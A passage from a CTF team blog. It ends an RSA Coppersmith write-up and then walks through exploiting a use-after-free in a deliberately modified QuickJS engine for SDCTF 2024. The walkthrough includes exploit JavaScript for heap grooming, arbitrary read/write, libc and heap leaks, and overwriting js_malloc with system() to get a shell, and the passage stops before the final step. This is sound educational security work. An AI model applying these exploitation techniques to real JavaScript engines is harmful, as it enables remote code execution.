different columns for the real and imaginary part of the powers of $x$ and using the imaginary multiples.</p>

<p>I’m glad I was able to solve it regardless because it’s better late than never. More importantly, I hope that this guide
can give you some understanding behind the complexities of the coppersmith method often needed for RSA challenges. In
this vein, I have another section with resources I found useful for this challenge.</p>

<p>Finally, shoutout to 18lauey2 for making such a cool challenge.</p>

<h2 id="resources-to-help-my-dumb-dumb-brain">Resources to help my dumb dumb brain</h2>

<ul>
  <li>A bunch of lectures from Tanja Lange on Coppersmith and RSA as part of 2MMMC10 at Eindhoven University of Technology
  <a href="https://www.youtube.com/@tanjalangecryptology783/videos">https://www.youtube.com/@tanjalangecryptology783/videos</a></li>
  <li>The blog written by Cousin Wu Ka Lok from <code class="language-plaintext highlighter-rouge">blackb6a</code> <a href="https://www.klwu.co/maths-in-crypto/lattice-2/#second-idea">https://www.klwu.co/maths-in-crypto/lattice-2/#second-idea</a></li>
  <li>The paper the challenge was inspired by <a href="https://ia803007.us.archive.org/2/items/arxiv-1008.1284/1008.1284.pdf">Ideal forms of Coppersmith’s theorem and Guruswami-Sudan list decoding</a></li>
  <li>A wonderful paper that summarizes the various attacks on RSA. <a href="https://eprint.iacr.org/2020/1506.pdf">Recovering cryptographic keys from partial information, by example</a></li>
</ul>

<p>That’s all folks.</p>]]></content><author><name>hiswui</name></author><summary type="html"><![CDATA[Problem Description]]></summary></entry><entry><title type="html">[SDCTF 2024] SlowJS++</title><link href="https://maplebacon.org/2024/05/sdctf-slowjspp/" rel="alternate" type="text/html" title="[SDCTF 2024] SlowJS++" /><published>2024-05-15T00:00:00+00:00</published><updated>2024-05-15T00:00:00+00:00</updated><id>https://maplebacon.org/2024/05/sdctf-slowjspp</id><content type="html" xml:base="https://maplebacon.org/2024/05/sdctf-slowjspp/"><![CDATA[<p><strong>Summary</strong>: Exploiting UAF due to an incorrect decrement to the reference count of an object in QuickJS Javascript engine to gain arbitrary read/write and leaks and then using that to gain RCE.</p>

<h2 id="intro">Intro</h2>

<p>SlowJS++ was a Javascript engine exploitation challenge in SDCTF 2024, with only 2 solves during the competition. I could not solve it before the end of the CTF, but I kept working on the exploit and I finally solved it about 10 hours after the end.</p>

<p>We were given the challenge binary, which was a recent version of QuickJS Javascript engine compiled with debug info, and told that it was being hosted on Ubuntu 23.10 in the remote environment. I downloaded the libc, libm, and ld for Ubuntu 23.10 and patched the binary to use those. The challenge also had a hint that said we should bindiff the <code class="language-plaintext highlighter-rouge">async_func_resume</code> function.</p>

<h2 id="quickjs-internals">QuickJS Internals</h2>

<p>This challenge is about async functions and promises in Javascript. I found <a href="https://developer.mozilla.org/en-US/docs/Learn/JavaScript/Asynchronous/Introducing">this</a>, <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Using_promises">this</a>, and <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise">this</a> very helpful in understanding the javascript concepts. Also, <a href="https://mem2019.github.io/jekyll/update/2021/09/27/TCTF2021-Promise.html">this writeup</a> was particularly helpful in understanding a bit more about QuickJS internals.</p>

<h3 id="1-jsvalue">1. JSValue</h3>

<p>QuickJS represents <code class="language-plaintext highlighter-rouge">JSValue</code>s as two qwords. The first one is the value (in case of int/double/etc.) or the pointer (for heap objects), and the second qword is a tag that shows the type of the first qword. The tags can be found <a href="https://github.com/bellard/quickjs/blob/d378a9f3a583cb787c390456e27276d0ee377d23/quickjs.h#L67">here</a>. The negative tag values are for objects that are managed by the heap and the garbage collector. The zero and positive tags are for objects that are not allocated separately on the heap, and are represented with their direct value (such as int, double, undefined, etc.). You can look at the different structs used by QuickJS both by looking at the source code and by opening the challenge binary in gdb and using <code class="language-plaintext highlighter-rouge">ptype /ox &lt;struct name&gt;</code>.</p>

<h3 id="2-jsstring">2. JSString</h3>

<p>The <code class="language-plaintext highlighter-rouge">JSString</code> struct represents a string, and it can be inspected with <code class="language-plaintext highlighter-rouge">ptype /ox JSString</code> in gdb:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>type = struct JSString {
/* 0x0000      |  0x0004 */    JSRefCountHeader header;
/* 0x0004: 0x0 |  0x0004 */    uint32_t len : 31;
/* 0x0007: 0x7 |  0x0001 */    uint8_t is_wide_char : 1;
/* 0x0008: 0x0 |  0x0004 */    uint32_t hash : 30;
/* 0x000b: 0x6 |  0x0001 */    uint8_t atom_type : 2;
/* 0x000c      |  0x0004 */    uint32_t hash_next;
/* 0x0010      |  0x0000 */    union {
/*                0x0000 */        uint8_t str8[0];
/*                0x0000 */        uint16_t str16[0];
                                   /* total size (bytes):    0 */
                               } u;
                               /* total size (bytes):   16 */
                             }
</code></pre></div></div>

<p>Basically, there’s some metadata, including the length of the string, in the first 16 bytes, and then from offset 16 the array of string bytes will start (<code class="language-plaintext highlighter-rouge">str8</code>). So, the content of the string is not stored in a separate buffer and is stored at the end of the <code class="language-plaintext highlighter-rouge">JSString</code> object itself.</p>

<h3 id="3-jsobject">3. JSObject</h3>

<p>The <code class="language-plaintext highlighter-rouge">JSObject</code> struct represents a generic javascript object in memory. You can see that each object has a gc header, and the first dword of the header is the reference count for the garbage collector. Another important thing about objects is their <code class="language-plaintext highlighter-rouge">class_id</code>, which shows the type of that object. Different class id values can be seen <a href="https://github.com/bellard/quickjs/blob/d378a9f3a583cb787c390456e27276d0ee377d23/quickjs.c#L118">here</a>. <code class="language-plaintext highlighter-rouge">JSObject</code>s also have two fields called <code class="language-plaintext highlighter-rouge">shape</code> and <code class="language-plaintext highlighter-rouge">prop</code>. <code class="language-plaintext highlighter-rouge">shape</code> points to a <code class="language-plaintext highlighter-rouge">JSShape</code> struct that describes the shape of an object and the properties that it has (similar to a map in v8), and the <code class="language-plaintext highlighter-rouge">prop</code> field is a pointer to an array of <code class="language-plaintext highlighter-rouge">JSProperty</code> structs that each hold the data for one of the properties of our object.</p>

<p>Two important objects to learn about are <code class="language-plaintext highlighter-rouge">ArrayBuffer</code>s and <code class="language-plaintext highlighter-rouge">TypedArray</code>s:</p>

<ul>
  <li>
    <p>An <code class="language-plaintext highlighter-rouge">ArrayBuffer</code> object is a <code class="language-plaintext highlighter-rouge">JSObject</code> that has a pointer to a <code class="language-plaintext highlighter-rouge">JSArrayBuffer</code> struct instance in its <code class="language-plaintext highlighter-rouge">obj.u.array_buffer</code> field. The <code class="language-plaintext highlighter-rouge">JSArrayBuffer</code> struct has a pointer to its backing storage memory (the actual data buffer) called <code class="language-plaintext highlighter-rouge">data</code> and a few other fields like the length.</p>
  </li>
  <li>
    <p>A <code class="language-plaintext highlighter-rouge">TypedArray</code> is a kind of array that allows the user to use an array buffer’s storage for different types. For example, a <code class="language-plaintext highlighter-rouge">Uint32Array</code> as a typed array that has an array buffer inside itself and uses that array buffer as an array of 32-bit integers. The important fields in a <code class="language-plaintext highlighter-rouge">JSObject</code> of a typed array are <code class="language-plaintext highlighter-rouge">obj.u.array.u1.typed_array</code>, <code class="language-plaintext highlighter-rouge">obj.u.array.u.ptr</code>, and <code class="language-plaintext highlighter-rouge">obj.u.array.count</code>. The <code class="language-plaintext highlighter-rouge">typed_array</code> field has a pointer to a <code class="language-plaintext highlighter-rouge">JSTypedArray</code> struct, which itself has a field called <code class="language-plaintext highlighter-rouge">obj</code> that points back at the <code class="language-plaintext highlighter-rouge">JSObject</code> of our typed array, and has another pointer called <code class="language-plaintext highlighter-rouge">buffer</code> that points to a <code class="language-plaintext highlighter-rouge">JSObject</code> representing the array buffer behind this typed array. the <code class="language-plaintext highlighter-rouge">ptr</code> and <code class="language-plaintext highlighter-rouge">count</code> fields in a typed array object represent the pointer to the backing storage of the array buffer behind this typed array (where the actual “data” is stored), and the length of the array. So, if <code class="language-plaintext highlighter-rouge">ta_obj</code> is the <code class="language-plaintext highlighter-rouge">JSObject</code> of our typed array, <code class="language-plaintext highlighter-rouge">ta_obj.u.array.u.ptr</code> and <code class="language-plaintext highlighter-rouge">ta_obj.u.array.u1.typed_array-&gt;buffer-&gt;u.array_buffer-&gt;data</code> both point to the backing storage memory of the array, but the first one is way more convenient so the <code class="language-plaintext highlighter-rouge">ptr</code> and <code class="language-plaintext highlighter-rouge">count</code> fields inside the typed array object itself are the ones that are used when accessing different indexes of the array. You can look at the source code of <code class="language-plaintext highlighter-rouge">JS_SetPropertyValue()</code> to see how this is done.</p>
  </li>
</ul>

<p>Another important thing to note about array buffers and typed arrays is that the <code class="language-plaintext highlighter-rouge">JSArrayBuffer</code> and <code class="language-plaintext highlighter-rouge">JSTypedArray</code> structs have <code class="language-plaintext highlighter-rouge">next</code> and <code class="language-plaintext highlighter-rouge">prev</code> fields inside their <code class="language-plaintext highlighter-rouge">struct list_head</code> fields that form a double-linked list. This double linked list will connect an array buffer with all typed arrays that use that array buffer as their storage buffer. The <code class="language-plaintext highlighter-rouge">js_array_buffer_finalizer</code> function
<a href="https://github.com/bellard/quickjs/blob/d378a9f3a583cb787c390456e27276d0ee377d23/quickjs.c#L53109">here</a> has a for-each loop that when an array buffer gets freed, goes through all typed arrays that use this array buffer and sets the <code class="language-plaintext highlighter-rouge">count</code> field of those typed arrays to zero. So, the approach in the writeup I mentioned earlier for a TCTF 2021 challenge does not work any more, because if you cause a UAF for an array buffer, you can no longer use typed arrays previously connected to it to read/write memory from its freed backing storage, as the <code class="language-plaintext highlighter-rouge">count</code> field of those typed arrays gets set to zero.</p>

<h2 id="debugging">Debugging</h2>

<p>A debugging approach that was mentioned in the TCTF writeup by r3kapig was to use <code class="language-plaintext highlighter-rouge">Math.min(obj)</code> and break on the <code class="language-plaintext highlighter-rouge">js_math_min_max</code> function in gdb, and then inspect the pointer at <code class="language-plaintext highlighter-rouge">*$r8</code> or <code class="language-plaintext highlighter-rouge">argv-&gt;u.ptr</code> after hitting the breakpoint to find the address of <code class="language-plaintext highlighter-rouge">obj</code>. I also used this approach for debugging and it was really helpful.</p>

<h2 id="vulnerability">Vulnerability</h2>

<p>I downloaded the source for the latest version of QuickJS from https://github.com/bellard/quickjs/tree/d378a9f3a583cb787c390456e27276d0ee377d23 (this is the latest commit at the time of the CTF) and built an original QuickJS binary with debug info to achieve something similar to the challenge binary. Opening both binaries in Ghidra and comparing the <code class="language-plaintext highlighter-rouge">async_func_resume</code> function, you can see that the challenge binary will decrease the reference count on the object returned by an async function, and if that reference count reaches zero it will free the object with <code class="language-plaintext highlighter-rouge">__JS_FreeValueRT</code> (given that the object has a negative tag value, which means that it is managed by the gc). This is probably the inlined version of the <code class="language-plaintext highlighter-rouge">JS_FreeValueRT</code> function <a href="https://github.com/bellard/quickjs/blob/d378a9f3a583cb787c390456e27276d0ee377d23/quickjs.h#L658">here</a>, which does the same thing. So, an object that is returned from an async function gets its refcount decreased by 1 when it shouldn’t have been decreased. So, if we can cause the refcount of an object to become zero and get the object freed while we still keep the reference to that object in our source, we can cause a UAF situation.</p>

<pre><code class="language-C">lVar3 = *(long *)(param_2 + 0xa0);
uVar4 = *(undefined8 *)(lVar3 + -8);
piVar5 = *(int **)(lVar3 + -0x10);
*(undefined (*) [16])(lVar3 + -0x10) = (undefined  [16])0x0;
*(undefined8 *)(lVar3 + -8) = 3;
// if the object has a negative tag (heap object) and (--refcount &lt;= 0):
if ((0xfffffff4 &lt; (uint)uVar4) &amp;&amp; (iVar1 = *piVar5, *piVar5 = iVar1 + -1, iVar1 + -1 &lt; 1)) {
  __JS_FreeValueRT(*(undefined8 *)(param_1 + 0x18),piVar5);	// free the object
}
</code></pre>

<p>Using the <code class="language-plaintext highlighter-rouge">Math.min(obj)</code> debug approach to inspect the reference count of some objects after they’re created, you can see that their reference count is 1 more than the expected value. For example, an object with only 1 reference to it has a refcount of 2. This is also something mentioned in the TCTF challenge writeup, and I don’t understand the reason for this either. I also think this might be because of some additional internal reference to the object in the engine.</p>

<h2 id="getting-arbitrary-readwrite">Getting arbitrary read/write</h2>

<p>I wrote an async function that returned the object <code class="language-plaintext highlighter-rouge">arr</code>, where <code class="language-plaintext highlighter-rouge">arr</code> is a globally-defined <code class="language-plaintext highlighter-rouge">Uint32Array</code>. I normally expected that after calling <code class="language-plaintext highlighter-rouge">fn1()</code> once and returning from it, <code class="language-plaintext highlighter-rouge">arr</code> is freed and the UAF is triggered. However, for some reason it appears that we need to call it twice to have <code class="language-plaintext highlighter-rouge">arr</code> get freed. I don’t clearly understand the reason for this and found this with a bit of trial and error and playing around with the initial PoC code. Also, it appeared that if the first <code class="language-plaintext highlighter-rouge">Math.min(arr)</code> call (between the <code class="language-plaintext highlighter-rouge">fn1()</code> calls; the one marked with <code class="language-plaintext highlighter-rouge">// ???</code>) is not there, <code class="language-plaintext highlighter-rouge">arr</code> will not get freed somehow. However, when the exploit is completed, commenting that <code class="language-plaintext highlighter-rouge">Math.min</code> call did not break the exploit. I assume this might have something to do with the garbage collector being invoked at different times in these situations, but I don’t understand this clearly either. The good thing is that although the garbage collector and the general heap layout of the application is not very predictable and causes weird issues like this, it is deterministic so it won’t change between different runs of the same js code, and we can tweak some stuff to make the issues caused by them go away.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">arr</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="mh">0x140</span><span class="p">);</span>
<span class="p">...</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">fn1</span><span class="p">()</span> <span class="p">{</span>
	<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">fn1</span><span class="dl">"</span><span class="p">);</span>
	<span class="k">return</span> <span class="nx">arr</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">...</span>
<span class="nx">fn1</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
	<span class="nb">Math</span><span class="p">.</span><span class="nx">min</span><span class="p">(</span><span class="nx">arr</span><span class="p">)</span> <span class="c1">// ???</span>
	<span class="nx">fn1</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
		<span class="nb">Math</span><span class="p">.</span><span class="nx">min</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>	<span class="c1">// arr gets freed here, but we still have the reference to it.</span>
	<span class="p">});</span>
<span class="p">});</span>
</code></pre></div></div>

<p>Now if we break after the second <code class="language-plaintext highlighter-rouge">fn1()</code> call, we can see that <code class="language-plaintext highlighter-rouge">arr</code> is freed and is in the malloc free lists. by inspecting the free lists (tcahce/fastbins) we can see that we need to allocate a few more objects to bring <code class="language-plaintext highlighter-rouge">arr</code>’s freed memory to the top of the free lists. We use a for loop to perform some allocations for this. All <code class="language-plaintext highlighter-rouge">JSObject</code> structs are allocated using 0x50-sized chunks, so allocating new objects on the heap will use the same free list as <code class="language-plaintext highlighter-rouge">arr</code>’s <code class="language-plaintext highlighter-rouge">JSObject</code> chunk:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">objs</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mi">6</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
	<span class="nx">objs</span><span class="p">.</span><span class="nx">push</span><span class="p">({</span><span class="na">a</span><span class="p">:</span> <span class="mi">1</span><span class="p">});</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The for loop is allocating 6 new objects and pushing them into some array to keep their references and prevent them from being freed. However, the number of iterations of the loop (6) is not always the same and changes weirdly because of the side effects of other parts of the code on the heap layout and gc operations. I had to change this value from 6 to 7 and vice versa serveral times during the exploit development process. You just have to look at the heap tcahce/fastbins layout at the breakpoint before this code segment to determine the number of iterations of this loop.</p>

<p>Now we want to allocate another <code class="language-plaintext highlighter-rouge">Uint32Array</code>, but this time we want its <code class="language-plaintext highlighter-rouge">ptr</code> field (which points to the actual data storage memory for the array) to point to the same chunk of memory that used to hold the <code class="language-plaintext highlighter-rouge">JSObject</code> struct for <code class="language-plaintext highlighter-rouge">arr</code>. Therefore, since <code class="language-plaintext highlighter-rouge">JSObject</code> structs are allocated in 0x50-sized chunks, it is necessary that the data size of our new array causes the allocation of an 0x50-sized chunk. So, we want our array’s data memory to have a size of 0x48, which means 18 4-byte integers. So, we will define <code class="language-plaintext highlighter-rouge">uaf_arr</code> as:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">uaf_arr</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="mi">18</span><span class="p">);</span>
</code></pre></div></div>

<p>The allocation of this new typed array causes 3 malloc calls that should return an 0x50-sized chunk. The first one is to host the <code class="language-plaintext highlighter-rouge">JSObject</code> of the <code class="language-plaintext highlighter-rouge">ArrayBuffer</code> behind this typed array. The second one is to host the backing storage memory of the array (the one that we want to collide with <code class="language-plaintext highlighter-rouge">arr</code>’s object struct), and the third one is for the <code class="language-plaintext highlighter-rouge">JSObject</code> of the typed array itself. So, we want <code class="language-plaintext highlighter-rouge">arr</code>’s freed memory to be the second chunk from the beginning of tcache before we instantiate <code class="language-plaintext highlighter-rouge">uaf_arr</code> to ensure that <code class="language-plaintext highlighter-rouge">uaf_arr</code>’s data pointer points to it. We need to adjust the number of allocated objects in the previous for loop to meet this requirement. We can do a <code class="language-plaintext highlighter-rouge">Math.min(uaf_arr)</code> right after this line to break and see if everything went as we wanted. <code class="language-plaintext highlighter-rouge">uaf_arr</code>’s data pointer (<code class="language-plaintext highlighter-rouge">ptr</code> field) must point to the same memory that hosted <code class="language-plaintext highlighter-rouge">arr</code>’s <code class="language-plaintext highlighter-rouge">JSObject</code> struct.</p>

<p>Now, we can write into <code class="language-plaintext highlighter-rouge">uaf_arr</code> and edit the object metadata of <code class="language-plaintext highlighter-rouge">arr</code> as we wish:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// set fake object metadata for 'arr'</span>
<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">10</span><span class="p">;</span>		<span class="c1">// large refcount to prevent it from being freed by the gc later</span>
<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x001b0d00</span><span class="p">;</span>	<span class="c1">// class_id of Uint32Array and some flags similar to what uaf_arr has</span>
<span class="nx">uaf_arr</span><span class="p">[</span><span class="mh">0x10</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x10000000</span><span class="p">;</span>	<span class="c1">// a huge length value (the .u.array.count field of JSObject)</span>
</code></pre></div></div>

<p>Now we can point <code class="language-plaintext highlighter-rouge">arr</code>’s data pointer (<code class="language-plaintext highlighter-rouge">.u.array.u.ptr</code> field) to any arbitrary location by editing its value through <code class="language-plaintext highlighter-rouge">uaf_arr</code> and then read/write that location by accessing <code class="language-plaintext highlighter-rouge">arr[0]</code>. However, we don’t have any kind of leak yet so we don’t know what address to write there. The memory of <code class="language-plaintext highlighter-rouge">uaf_arr</code> is also zeroed out when its re-allocated, so we can’t find any pointers there.</p>

<h2 id="getting-leaks">Getting leaks</h2>

<p>In order to get leaks I did the same thing that we did to <code class="language-plaintext highlighter-rouge">arr</code>, but this time to a string. If we can cause a <code class="language-plaintext highlighter-rouge">JSString</code> to be freed and then allocate a <code class="language-plaintext highlighter-rouge">Uint32Array</code> whose data pointer points to the <code class="language-plaintext highlighter-rouge">JSString</code> struct memory, we can manipulate the length of the <code class="language-plaintext highlighter-rouge">JSString</code> and set it to some huge value, and then we can have oob read on the heap through that string.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">str</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ</span><span class="dl">"</span><span class="p">;</span>	<span class="c1">// a JSString that occupies an 0x50-sized chunk</span>
<span class="p">...</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">fn2</span><span class="p">()</span> <span class="p">{</span>
	<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">fn2</span><span class="dl">"</span><span class="p">);</span>
	<span class="k">return</span> <span class="nx">str</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">...</span>
<span class="nx">fn1</span><span class="p">().</span><span class="nx">then</span><span class="p">({</span>
	<span class="nx">fn1</span><span class="p">().</span><span class="nx">then</span><span class="p">({</span>
		<span class="p">...</span>
		<span class="c1">// do stuff related to causing UAF for 'arr'</span>
		<span class="p">...</span>
		<span class="nx">fn2</span><span class="p">().</span><span class="nx">then</span><span class="p">({</span>
			<span class="nx">fn2</span><span class="p">().</span><span class="nx">then</span><span class="p">({</span>
				<span class="c1">// 'str' gets freed here while we still have a reference to it.</span>

				<span class="c1">// allocate more objects to bring str's freed memory near the top of tcachebin</span>
				<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mi">6</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
					<span class="nx">objs</span><span class="p">.</span><span class="nx">push</span><span class="p">({</span><span class="na">a</span><span class="p">:</span> <span class="mi">1</span><span class="p">});</span>
				<span class="p">}</span>

				<span class="c1">// allocate a typed array with its data pointer pointing to str's freed memory (freed JSString struct)</span>
				<span class="kd">var</span> <span class="nx">uaf_str_arr</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="mi">18</span><span class="p">);</span>

				<span class="c1">// set metadata of the JSString struct</span>
				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span>	<span class="c1">// large refcount to avoid it getting freed by gc</span>
				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x10000000</span><span class="p">;</span>	<span class="c1">// huge length</span>
				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x497f93b1</span><span class="p">;</span>	<span class="c1">// some metadata I copied from original 'str'</span>
				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x4b</span><span class="p">;</span>			<span class="c1">// some metadata I copied from original 'str'</span>
				
				<span class="p">...</span>
			<span class="p">});</span>
		<span class="p">});</span>
	<span class="p">});</span>
<span class="p">});</span>
</code></pre></div></div>

<p>This has the exact same process as exploiting <code class="language-plaintext highlighter-rouge">arr</code>. You just have to adjust the size of the initial content of <code class="language-plaintext highlighter-rouge">str</code> so that its <code class="language-plaintext highlighter-rouge">JSString</code> struct is allocated in an 0x50-sized chunk, so allocating <code class="language-plaintext highlighter-rouge">{a: 1}</code> objects will allocate from the same malloc freelist as it.</p>

<p>Now that we can read stuff from the heap, I wrote a helper function to read a dword from the heap:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">const</span> <span class="nx">read_dword</span> <span class="o">=</span> <span class="p">(</span><span class="nx">offset</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
	<span class="kd">let</span> <span class="nx">result</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">3</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&gt;=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span>
		<span class="nx">result</span> <span class="o">=</span> <span class="p">(</span><span class="nx">result</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span><span class="p">)</span> <span class="o">|</span> <span class="nx">str</span><span class="p">.</span><span class="nx">charCodeAt</span><span class="p">(</span><span class="nx">offset</span> <span class="o">+</span> <span class="nx">i</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="k">return</span> <span class="nx">result</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>

<p>Then, I set a breakpoint and used <code class="language-plaintext highlighter-rouge">tel</code> gdb command to inspect the pointers that come after <code class="language-plaintext highlighter-rouge">str</code>’s buffer on the heap. I could find a pointer with a constant offset from libc base and another pointer with a constant offset from heap base. I used these to leak libc and heap base.</p>

<h2 id="getting-rce">Getting RCE</h2>

<p>The <code class="language-plaintext highlighter-rouge">JSContext *ctx</code> that gets passed as the first argument to many js functions has a field named <code class="language-plaintext highlighter-rouge">rt</code> which is a pointer to <code class="language-plaintext highlighter-rouge">JSRuntime</code>. <code class="language-plaintext highlighter-rouge">JSRuntime</code> also has a field <code class="language-plaintext highlighter-rouge">JSMallocFunctions mf</code>, and another one <code class="language-plaintext highlighter-rouge">JSMallocState malloc_state</code>. <code class="language-plaintext highlighter-rouge">mf</code> has 4 function pointers, the first of which is <code class="language-plaintext highlighter-rouge">js_malloc</code>. Its signature shows that the first argument to it is a <code class="language-plaintext highlighter-rouge">JSMallocState *</code>. So, if we can overwrite the <code class="language-plaintext highlighter-rouge">ctx-&gt;rt-&gt;mf.js_malloc</code> function pointer with <code class="language-plaintext highlighter-rouge">system()</code> and we can write <code class="language-plaintext highlighter-rouge">"/bin/sh"</code> at <code class="language-plaintext highlighter-rouge">&amp;(ctx-&gt;rt-&gt;malloc_state)</code>, we will be able to call <code class="language-plaintext highlighter-rouge">system("/bin/sh")</code> by triggering <code class="language-plaintext highlighter-rouge">js_malloc</code>. Just before doing that, I set the <code class="language-plaintext highlighter-rouge">shape</code> field of <code class="language-plaintext highlighter-rouge">arr</code>’s object metadata to point to the middle of some area near the base of the heap that seemed to contain just zero. This will prevent segfaults in an inline function <code class="language-plaintext highlighter-rouge">find_own_property</code> called by <code class="language-plaintext highlighter-rouge">JS_SetPropertyInternal</code>, which is the function used for writing to an index of <code class="language-plaintext highlighter-rouge">arr</code>. In the end, allocating any object will trigger <code class="language-plaintext highlighter-rouge">js_malloc</code> and give us a shell. This is the final part of the exploit:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// leak the heap base low and high dwords by reading them from the heap</span>
<span class="kd">let</span> <span class="nx">heap_base_high</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x54</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">heap_base_low</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x50</span><span class="p">)</span> <span class="o">-</span> <span class="mh">0xd60</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">heap_base_high</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">heap_base_low</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>

<span class="c1">// set the 'shape' property of 'arr' to the middle of an area with zeros.</span>
<span class="c1">// this will prevent segfaults in find_own_property which is an inlined function called</span>
<span class="c1">// by JS_SetPropertyInternal when performing writes to an index of arr</span>
<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_low</span> <span class="o">+</span> <span class="mh">0x200</span><span class="p">;</span>
<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">7</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_high</span><span class="p">;</span>

<span class="c1">// set the data pointer of arr to point to the heap base</span>
<span class="nx">uaf_arr</span><span class="p">[</span><span class="mh">0xe</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_low</span><span class="p">;</span>
<span class="nx">uaf_arr</span><span class="p">[</span><span class="mh">0xf</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_high</span><span class="p">;</span>

<span class="c1">// leak (main_arena+96), which is a libc address, by reading it off the heap</span>
<span class="kd">let</span> <span class="nx">libc_leak_low</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">libc_leak_high</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x104</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">libc_leak_high</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">libc_leak_low</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>

<span class="c1">// Math.min(uaf_arr);</span>

<span class="c1">// set ctx-&gt;rt-&gt;mf-&gt;js_malloc to system()</span>
<span class="nx">arr</span><span class="p">[</span><span class="mh">0xa8</span><span class="p">]</span> <span class="o">=</span> <span class="nx">libc_leak_low</span> <span class="o">-</span> <span class="mh">0x1a9a50</span><span class="p">;</span>	<span class="c1">// libc-dependant offset</span>
<span class="nx">arr</span><span class="p">[</span><span class="mh">0xa9</span><span class="p">]</span> <span class="o">=</span> <span class="nx">libc_leak_high</span><span class="p">;</span>

